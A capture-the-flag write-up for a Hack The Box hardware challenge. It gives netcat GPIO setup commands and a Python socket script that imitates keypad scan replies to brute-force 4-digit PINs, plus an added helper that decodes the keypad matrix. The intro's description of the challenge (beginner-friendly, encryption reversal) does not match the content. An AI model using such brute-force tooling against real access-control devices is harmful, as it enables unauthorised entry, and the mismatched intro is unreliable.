HackTheBox The Last Frontier Writeup
Explore the basics of cybersecurity in The Last Frontier Challenge on Hack The Box. This hard-level Challenge introduces encryption reversal and file handling concepts in a clear and accessible way, perfect for beginners.
https://app.hackthebox.com/challenges/779
Description
You’ve navigated past the main defenses, but there’s one more hurdle: an air-gapped security keypad guarding the lab. We already tried up until the 5000 passcode but we did not manage to open it. We need a faster way to go through all the 4-digit passcodes. Luckily, we’ve exposed some traces on the device’s keypad. Since it’s air-gapped, you’ll need to manually manipulate these pins to mimic the correct keypress sequence. Understanding circuit behavior and exploiting potential vulnerabilities in the hardware is key. Carefully manipulate the pins to unlock the door without triggering any alarms. This is your final step to securing the patch for distribution across the city. To aid in your mission, we have created a remote command and control interface for our custom module connected to the security keypad’s traces. The schematic we’ve drafted based on the device’s keypad configuration should be enough to get you started. (To enter a passcode send # it at the end)
Exploitation
Connect with nc and set up the GPIO:
#cmd> comm-module-id
#id> 35
#Module ID set to 35
#cmd> GPIO
#set> 1 0
#GPIO-1 set to: 0
Disconnect, then run the following script:
import socket
import sys
import time

if len(sys.argv) < 2:
    print(f"Usage: python {sys.argv[0]} <ip:port1,port2>")
    sys.exit(1)

# argv[1] is ip:port1,port2 (port1: nc command interface, port2: keypad connection)
host, ports_str = sys.argv[1].split(':')
ports = [int(port) for port in ports_str.split(',')]

key_presses = '5254#'
current_key_to_send = 0

# For each key: [reply to an 'F0' scan, reply to a '0F' scan]
keymap = {
    '1': ['E0', '0E'], '2': ['D0', '0E'], '3': ['B0', '0E'], 'A': ['70', '0E'],
    '4': ['E0', '0D'], '5': ['D0', '0D'], '6': ['B0', '0D'], 'B': ['70', '0D'],
    '7': ['E0', '0B'], '8': ['D0', '0B'], '9': ['B0', '0B'], 'C': ['70', '0B'],
    '*': ['E0', '07'], '0': ['D0', '07'], '#': ['B0', '07'], 'D': ['70', '07']
}


def interact_with_nc(sock_nc):
    """Send the 'system' command and report whether the reply contains the flag."""
    sock_nc.sendall(b"system\n")
    time.sleep(0.5)
    response = sock_nc.recv(4096).decode('utf-8')
    print("Received from NC server:", response)
    return 'HTB{' in response


def simulate_keypad_read(command):
    """Answer one scan command as if the current key were held down."""
    global current_key_to_send
    if command == 'F0':
        key = key_presses[current_key_to_send]
        return keymap[key][0] + '\n'
    elif command == '0F':
        key = key_presses[current_key_to_send]
        current_key_to_send += 1  # second half of the scan done, move to the next key
        return keymap[key][1] + '\n'
    else:
        return 'FF\n'  # no key pressed


def run_client(server_host, server_port):
    global key_presses, current_key_to_send
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock_nc, \
         socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
        sock_nc.connect((host, ports[0]))
        print("Connected to NC server.")
        sock.connect((server_host, server_port))
        print("Connected to server")
        # Passcodes up to 5000 were already tried (see Description),
        # so cover the remaining 4-digit codes.
        for pin in range(5000, 10000):
            key_presses = f"{pin:04d}#"
            print(key_presses)
            current_key_to_send = 0
            while True:
                data = sock.recv(1024).decode('utf-8').strip()
                if not data:
                    print("Server closed the connection")
                    return
                print(f"Received from server: {data}")
                response = simulate_keypad_read(data)
                if response:
                    sock.sendall(response.encode('utf-8'))
                if len(key_presses) == current_key_to_send:
                    break  # every key of this passcode has been sent
                if data == 'quit':
                    print("Quit command received")
                    break
            # Stop as soon as the reply contains the flag
            if interact_with_nc(sock_nc):
                return


if __name__ == "__main__":
    run_client(host, ports[1])
Wait for the PIN to be brute-forced; the flag is then revealed.
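The keymap table in the script above is not arbitrary: it is what a 4x4 matrix keypad returns during a two-phase scan. The following added example (not part of the original writeup or the challenge files) rebuilds that table from the keypad layout and decodes reply pairs back into keys. It assumes active-low lines, with the upper nibble selecting the column and the lower nibble selecting the row, which is inferred from the table's values; the function names are hypothetical.

```python
# Added example: derive and invert the writeup's keymap from the keypad layout.
# Assumption (inferred from the table): lines are active-low, the reply to 'F0'
# carries the column in its upper nibble, the reply to '0F' the row in its lower nibble.
LAYOUT = ["123A", "456B", "789C", "*0#D"]  # standard 4x4 keypad, rows top to bottom


def one_low(bit):
    """4-bit value with every line high except `bit`."""
    return 0xF & ~(1 << bit)


def build_keymap(layout=LAYOUT):
    """Map each key to [reply to 'F0', reply to '0F'] as two-digit hex strings."""
    keymap = {}
    for row, keys in enumerate(layout):
        for col, key in enumerate(keys):
            col_reply = f"{one_low(col) << 4:02X}"  # column line pulled low
            row_reply = f"{one_low(row):02X}"       # row line pulled low
            keymap[key] = [col_reply, row_reply]
    return keymap


def decode(col_reply, row_reply, layout=LAYOUT):
    """Return the key for one reply pair, or None unless exactly one key is down."""
    upper = int(col_reply, 16) >> 4
    lower = int(row_reply, 16) & 0xF
    cols = [c for c in range(4) if not upper >> c & 1]
    rows = [r for r in range(4) if not lower >> r & 1]
    if len(cols) != 1 or len(rows) != 1:
        return None  # idle (FF) or several lines low at once
    return layout[rows[0]][cols[0]]


def decode_sequence(pairs):
    """Decode a list of (F0 reply, 0F reply) pairs; '?' marks an undecodable pair."""
    return "".join(decode(c, r) or "?" for c, r in pairs)


if __name__ == "__main__":
    km = build_keymap()
    sample = [km[k] for k in "5254#"]  # constructed sample, same string as the script's default
    print(sample, "->", decode_sequence(sample))
```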
Summary
The Last Frontier Challenge on Hack The Box is a hard-level challenge that focuses on advanced hardware manipulation and network communication. Participants configure GPIO settings via the command line, use socket programming to automate network interactions, and conduct a brute-force attack to decode a PIN. This challenge effectively combines hardware control with practical cybersecurity techniques.